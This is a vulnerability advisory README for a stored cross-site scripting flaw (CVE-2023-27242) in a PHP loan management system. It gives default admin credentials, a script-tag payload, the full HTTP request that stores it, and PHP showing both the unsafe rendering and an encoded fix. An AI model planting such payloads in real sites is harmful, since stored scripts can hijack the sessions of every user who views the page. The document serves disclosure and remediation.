CVE-2023-27242: Loan-Management-System/README.md at main · kaikai-11/Loan-Management-System

SourceCodester Loan Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Type parameter under the Edit Loan Types module.


Loan-Management-System v1.0 by itsourcecode.com has Cross-site Scripting (XSS)

Vul_Author: Kai Wang

Login account: admin, password: admin123

Vendor: https://itsourcecode.com/free-projects/php-project/loan-management-system-project-in-php-with-source-code/

Vulnerability File: /Loan/ajax.php

Vulnerability location: /Loan/ajax.php?action=save_loan_type HTTP/1.1

[+] Payload: <script>alert(1)</script>

Tested on Windows 10, phpStudy

An example request that triggers the alert:

POST /Loan/ajax.php?action=save_loan_type HTTP/1.1
Host: 10.12.180.79
Content-Length: 362
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.41
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl0Dh1LXu5fRCTYLI
Origin: http://10.12.180.79
Referer: http://10.12.180.79/Loan/index.php?page=loan_type
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=d4me9tekbcuef2k8k1qupv9i0t
Connection: close

------WebKitFormBoundaryl0Dh1LXu5fRCTYLI
Content-Disposition: form-data; name="id"


------WebKitFormBoundaryl0Dh1LXu5fRCTYLI
Content-Disposition: form-data; name="type_name"

<script>alert(1)</script>
------WebKitFormBoundaryl0Dh1LXu5fRCTYLI
Content-Disposition: form-data; name="description"

test loans
------WebKitFormBoundaryl0Dh1LXu5fRCTYLI--

Go to the Loan Types page and click the edit button as shown in the image.

Input an XSS script in the ‘Type’ input box.

Click save and you will see an alert.
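The request above stores the type_name value, and the Loan Types page later renders it into HTML without encoding, which is why the script runs for every user who views that page. The PHP below is an added illustration, not code from the Loan Management System project: the function names, the $row array and the validation pattern are assumptions; it shows the unsafe rendering pattern beside an output-encoded version and an input-side check for the save_loan_type handler.

```php
<?php
// Added illustration, not the project's code. Function names, the $row array
// and the validation rule are hypothetical; the sample row reuses the
// advisory's payload so the difference between the two renderers is visible.

// Unsafe pattern: the stored value is concatenated into HTML as-is, so a
// type_name of <script>alert(1)</script> executes in the viewer's browser.
function render_row_unsafe(array $row): string
{
    return "<tr><td>{$row['type_name']}</td><td>{$row['description']}</td></tr>";
}

// Hardened pattern: encode at output time for the HTML text context.
// ENT_QUOTES also covers attribute values; ENT_SUBSTITUTE replaces invalid
// UTF-8 instead of returning an empty string, which would hide data.
function esc(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_row_safe(array $row): string
{
    return '<tr><td>' . esc($row['type_name']) . '</td><td>'
         . esc($row['description']) . '</td></tr>';
}

// Defence in depth on the save_loan_type side: a loan type name has no
// legitimate need for markup characters, so reject them before storage.
// Output encoding remains the primary control; this only narrows the input.
function validate_type_name(string $name): bool
{
    return (bool) preg_match('/^[\p{L}\p{N} .,&\'()\/-]{1,100}$/u', $name);
}

// Constructed sample row carrying the payload from the advisory.
$row = ['type_name' => '<script>alert(1)</script>', 'description' => 'test loans'];

echo render_row_unsafe($row), "\n";
echo render_row_safe($row), "\n";

var_dump(validate_type_name($row['type_name']));
var_dump(validate_type_name('Personal Loan'));
```

The encoded row shows the payload as literal text in the table instead of executing, and the validator rejects the advisory's payload while accepting an ordinary loan type name.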
